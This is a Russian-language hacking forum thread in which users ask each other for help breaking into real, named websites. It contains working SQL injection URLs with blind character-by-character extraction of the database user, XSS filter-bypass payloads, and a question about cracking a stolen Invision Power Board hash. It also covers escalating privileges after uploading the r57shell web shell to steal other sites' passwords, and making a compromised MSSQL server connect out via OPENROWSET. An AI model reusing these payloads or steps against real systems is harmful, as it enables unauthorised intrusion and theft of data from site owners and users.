Есть сплоит Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC Так вот, он ворует хеш, но на сколько мне известно в Invision Power Board 2.x.x алгоритм такой: Значит нужна соль, сплоит её не ворует, где же её взять?
Еще вопрс, что означает эта уязвимость? Как ей можно воспользоваться? http://www.campustore.it/ita/viewpage.aspx?ID=431'
час ночи и мозг отказывается работать. раскрутит кто? с результатами желательно в пм (- http://www.zahar.de/bigmir/forum/showprofil.php?id=1'
Да как бы проблем особо нету=) КРоме того что долго это все... 1) http://www.zahar.de/bigmir/forum/showprofil.php?id=999+union+select+ascii(substring(user(),1,1))+limit+1,1 - первый символ 85 2) http://www.zahar.de/bigmir/forum/showprofil.php?id=999+union+select+ascii(substring(user(),2,1))+limit+1,1 - второй символ 55 И т.д. погнали
у меня проблема если идет фильтрация select и char как можна ещё заменить ? да ещё пробывал ?id=-75 AND 1=1/* And тоже фильтруется
Видишь ли в чём дело, надо быть очень криворуким кодером, чтобы поставить фильтрацию на AND, char и select, и при этом оставить скуль в параметре id 100% ты что-то делаешь неправильно. линк кинь посмотрим
Вопрос: Имею доступ к MSSQL серверу с правами dbo, через баг в asp скрипте. Можно ли открыть порт 1433 для удаленного коннекта (к примеру через sp_configure)? Firewall отсутствует. Если можно, то каким образом. Спасибо
Люди помогите плиз, я новичек в этом деле, поэтому всех фишек не знаю. У меня проблема - залил r57shell на серв - там сэйф моде отключен система freebsd 6.2. Можно ли как нибудь повысить привелегии, или вообще получить пароли к остальным сайтам на этом серве - это моя основная цель. Заранее спасибо
http://www.prodayka.ru/search.php?do_search=Search&searchword=%22%>+javasc<script<>ript:alert(a) фильтрация стоит, но в принципе обходимая. вписать можно что угодно, просто показал пример обхода фильтрации. можно как либо использовать подобное?
Я тот сайт потерял не могу вам показать, но есть другой вот например с этим можна что - то сделать ? http://myua.com.ua/index.php?l=2&o=96 ключевые слова тож фильтруются Выбрал случайный сайт просто чем сложнее тем интиресний взломать
ребятки, не могу найти на ачате инфу про фильтрацию слов. какие могут быть возможные методы обхода фильтрации целых слов?.
к сожалению, как настроить mssql сервер для разрешения удаленных подключений сказать не могу, но можно поступить обратным образом, т.е. заставить mssql подключиться к твоему серверу с помощью OPENROWSET и OPENDATASOURCE. По данной теме есть хорошая статья на секлабе: http://www.securitylab.ru/analytics/216396.php
ох фак, не написал. я имел в виду скуль. есть скуль, но без объединения запросов мне придется втыкать вслепую конкретно на сайте в запросе недопускается "union". post'ом не хавает
